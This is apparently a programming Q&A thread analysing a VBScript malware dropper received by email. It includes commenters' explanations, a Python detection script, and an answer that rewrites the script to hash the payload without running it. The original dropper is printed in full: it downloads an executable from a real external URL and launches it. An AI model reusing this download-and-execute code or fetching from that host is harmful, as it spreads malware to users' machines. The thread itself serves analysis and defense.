2

Someone sent me an email with a VBS script, but I don't know what it is as I don't know VBS.

I am guessing this is a swindle to extort some data from me, but I can't really tell what data. Can someone please explain what that script would do?

Sub HTTPUpload( myURL, myPath )
    Dim objShell
    Set objShell = WScript.CreateObject( "WScript.Shell" )
    Dim i, objFile, objFSO, objHTTP, strFile, strMsg
    Const ForReading = 1, ForWriting = 2, ForAppending = 8
    Set objFSO = CreateObject( "Scripting.FileSystemObject" )
    Const TemporaryFolder = 2
    ' Pick a random file name with an .exe extension in the user's temp folder
    Set tfolder = objFSO.GetSpecialFolder(TemporaryFolder)
    tname = objFSO.GetTempName + ".exe"
    myPath = tfolder + "/" + tname
    Set objFile = tfolder.CreateTextFile(tname)
    ' Fetch the remote content
    Set objHTTP = CreateObject( "WinHttp.WinHttpRequest.5.1" )
    objHTTP.Open "GET", myURL, False
    objHTTP.Send
    ' Write the response byte by byte through a text stream
    For i = 1 To LenB( objHTTP.ResponseBody )
        objFile.Write Chr( AscB( MidB( objHTTP.ResponseBody, i, 1 ) ) )
    Next
    objFile.Close( )
    ' Launch the dropped file
    objShell.Run(myPath)
    Set objShell = Nothing
End Sub
HTTPUpload "http://baikalmix.ru/bitrix/js/seo/.../log.php?f=404", ""
user692942
A. Kuc
  • The script would (try to) download and run something (presumably an executable) from the URL in the last line. – Ansgar Wiechers Jun 09 '16 at 15:12
  • `tname = objFSO.GetTempName + ".exe"` would definitely be an executable. Other thing: the server is in Russia. Also the programming technique is wrong. It's trying to write binary but using text functions. – Jun 09 '16 at 18:01
  • @AnsgarWiechers It actually creates an empty `exe` file locally, then using the `WinHttpRequest` it injects the binary content of the executable from a remote location, then attempts to execute the file using the `WScript.Shell` `Run()` method. – user692942 Jun 10 '16 at 09:42
  • @Noodles `MidB()`, `AscB()` and `LenB()` are not *"text functions"*; they are used against binary data. – user692942 Jun 10 '16 at 09:44
  • https://blogs.msdn.microsoft.com/ericlippert/2005/04/20/binary-files-and-the-file-system-object-do-not-mix/ – Jun 10 '16 at 09:52
  • @Lankymart One can use an ADODB stream object. Just set it to `responsebody`. But you can't write to it directly as it takes a byte array which VBScript doesn't have. See http://stackoverflow.com/questions/37459978/make-script-file-download-excutue/37460257#37460257 – Jun 10 '16 at 09:57
  • @Noodles I'm not sure what you are getting at with the article link, but if you read it you will realise that it doesn't fail, it just has the potential to fail. It all depends on the default character set the Windows OS is using, but I doubt the attackers are bothered about hitting the percentage who have DBCS. I was simply pointing out that those functions are not *"text functions"*. – user692942 Jun 10 '16 at 10:05
  • They are text functions, but as usual, you miss the point. The TEXTSTREAM object is a TEXT object. Don't think the example is the only one. It only works on western OSs. – Jun 13 '16 at 10:22
  • VBScript can take it as a byte array and download binary files. I think there's a limitation of about 200MB however. I had to redo some code in JavaScript using the .Net 2.0 framework from the VBScript to get a 700MB file, but VBScript is well capable of downloading binary data in chunks and executing. – Steve Kline Jun 13 '16 at 17:03
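As an added example (not code from the question or the answer), a small Python triage script that flags the download-and-execute chain the comments describe in a VBScript sample, plus the byte-by-byte TextStream write idiom they argue about. The embedded sample is constructed to mirror the posted script, with a placeholder URL in place of the real one.

```python
import re

# Constructed sample mirroring the posted script; the URL is a placeholder.
SAMPLE_VBS = r'''
Sub HTTPUpload( myURL, myPath )
    Set objShell = WScript.CreateObject( "WScript.Shell" )
    Set objFSO = CreateObject( "Scripting.FileSystemObject" )
    tname = objFSO.GetTempName + ".exe"
    Set objHTTP = CreateObject( "WinHttp.WinHttpRequest.5.1" )
    objHTTP.Open "GET", myURL, False
    objHTTP.Send
    For i = 1 To LenB( objHTTP.ResponseBody )
        objFile.Write Chr( AscB( MidB( objHTTP.ResponseBody, i, 1 ) ) )
    Next
    objShell.Run(myPath)
End Sub
HTTPUpload "http://sample.invalid/log.php?f=404", ""
'''

# Each indicator alone is ordinary automation; the combination is the dropper chain.
INDICATORS = {
    "http_client": re.compile(r'CreateObject\(\s*"(?:WinHttp\.WinHttpRequest|MSXML2\.(?:Server)?XMLHTTP)', re.I),
    "temp_executable": re.compile(r'GetTempName\s*[+&]\s*"\.(?:exe|scr|com|bat|cmd|dll)"', re.I),
    "shell_object": re.compile(r'CreateObject\(\s*"WScript\.Shell"', re.I),
    "process_launch": re.compile(r'\b\w+\.(?:Run|Exec)\s*\(?\s*\w', re.I),
    # Byte-by-byte write through a TextStream: the corruption-prone idiom from the comments.
    "text_stream_binary_write": re.compile(r'Chr\(\s*AscB\(\s*MidB\(', re.I),
}
URL_RE = re.compile(r'"(https?://[^"\s]+)"', re.I)
EXEC_CHAIN = {"http_client", "temp_executable", "process_launch"}


def triage(script_text):
    """Return the indicators hit (with line numbers), embedded URLs and a verdict."""
    hits = {}
    for lineno, line in enumerate(script_text.splitlines(), 1):
        for name, rx in INDICATORS.items():
            if rx.search(line):
                hits.setdefault(name, []).append(lineno)
    urls = URL_RE.findall(script_text)
    if EXEC_CHAIN.issubset(hits):
        verdict = "download-and-execute"
    elif "http_client" in hits and urls:
        verdict = "downloader"
    else:
        verdict = "no-match"
    return {"indicators": hits, "urls": urls, "verdict": verdict}


if __name__ == "__main__":
    print(triage(SAMPLE_VBS))
```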

1 Answer

2

As the other guy stated, it could very well be a virus. It's downloading binary data, writing it as an EXE and firing itself off. You could modify it with this code below. ... You could also just delete the email and forget that dude. I know not "everyone" is as crazy as some of us when it comes to finding viruses in the wild; we hoard these things and study them.

I've amended some changes that would provide you with an MD5 hash and SHA256 hash that's searchable on VirusTotal and delete the file immediately after. You just need to re-append that line for HTTPUpload... and it will download... but if you see below I removed the line that was attempting to use the .Run method.

HTTPUpload "http://baikalmix.ru/bitrix/js/seo/.../log.php?f=404", ""

The link you provided is cut off, but if you still have the vbs file, then just remove that whole section of Sub HTTPUpload through End Sub which was right before it... Replace the entire content of the vbs file except for that line mentioned above.

Sub HTTPUpload( myURL, myPath )
    Dim objFSO, objHTTP, tfolder, tname
    Const TemporaryFolder = 2
    Const adTypeBinary = 1, adSaveCreateOverWrite = 2
    Set objFSO = CreateObject( "Scripting.FileSystemObject" )
    Set tfolder = objFSO.GetSpecialFolder(TemporaryFolder)
    tname = objFSO.GetTempName & ".exe"
    myPath = objFSO.BuildPath(tfolder.Path, tname)
    Set objHTTP = CreateObject( "WinHttp.WinHttpRequest.5.1" )
    objHTTP.Open "GET", myURL, False
    objHTTP.Send
    ' Save the response as raw bytes through an ADODB.Stream. The original
    ' Chr(AscB(MidB())) loop went through a TextStream, which can alter bytes
    ' depending on the system code page and would then change the hashes.
    With CreateObject("ADODB.Stream")
        .Type = adTypeBinary
        .Open
        .Write objHTTP.ResponseBody
        .SaveToFile myPath, adSaveCreateOverWrite
        .Close
    End With
    ' Hash the file for a VirusTotal lookup, then delete it. The file is never run.
    ' (The variable in scope here is myPath, not sPath.)
    WScript.Echo "    MD5Hash: " & MD5Hash(myPath) & vbCrLf & " SHA256Hash: " & Sha256Hash(myPath)
    objFSO.DeleteFile myPath, True
End Sub

Function MD5Hash(sPath)
    MD5Hash = BytesToHex(MD5HashBytes(GetBytes(sPath)))
End Function
Function Sha256Hash(sPath)
    Sha256Hash = BytesToHex(Sha256HashBytes(GetBytes(sPath)))
End Function

Function MD5HashBytes(aBytes)
    Set objmd5 = CreateObject("System.Security.Cryptography.MD5CryptoServiceProvider")
    objmd5.Initialize()
    MD5HashBytes = objmd5.ComputeHash_2( (aBytes) )
End Function

Function Sha256HashBytes(aBytes)
    Set objsha256 = CreateObject("System.Security.Cryptography.SHA256Managed")
    objsha256.Initialize()
    Sha256HashBytes = objsha256.ComputeHash_2( (aBytes) )
End Function

Function StringtoUTFBytes(aString)
    Set UTF8 = CreateObject("System.Text.UTF8Encoding")
    StringtoUTFBytes = UTF8.GetBytes_4(aString)
End Function

Function BytesToHex(aBytes)
    ' Render each byte as two uppercase hex digits
    For x = 1 To LenB(aBytes)
        hexStr = Hex(AscB(MidB((aBytes), x, 1)))
        If Len(hexStr) = 1 Then hexStr = "0" & hexStr
        BytesToHex = BytesToHex & hexStr
    Next
End Function

Function BytesToBase64(varBytes)
    With CreateObject("MSXML2.DomDocument").CreateElement("b64")
        .dataType = "bin.base64"
        .nodeTypedValue = varBytes
        BytesToBase64 = .Text
    End With
End Function

Function GetBytes(sPath)
    ' Read the whole file as a binary byte array
    With CreateObject("ADODB.Stream")
        .Type = 1
        .Open
        .LoadFromFile sPath
        .Position = 0
        GetBytes = .Read
        .Close
    End With
End Function
Steve Kline